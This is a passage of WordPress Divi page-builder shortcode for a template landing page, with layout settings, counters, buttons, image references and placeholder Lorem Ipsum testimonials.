text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Generating New Ideas. Solving Big Problems</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" 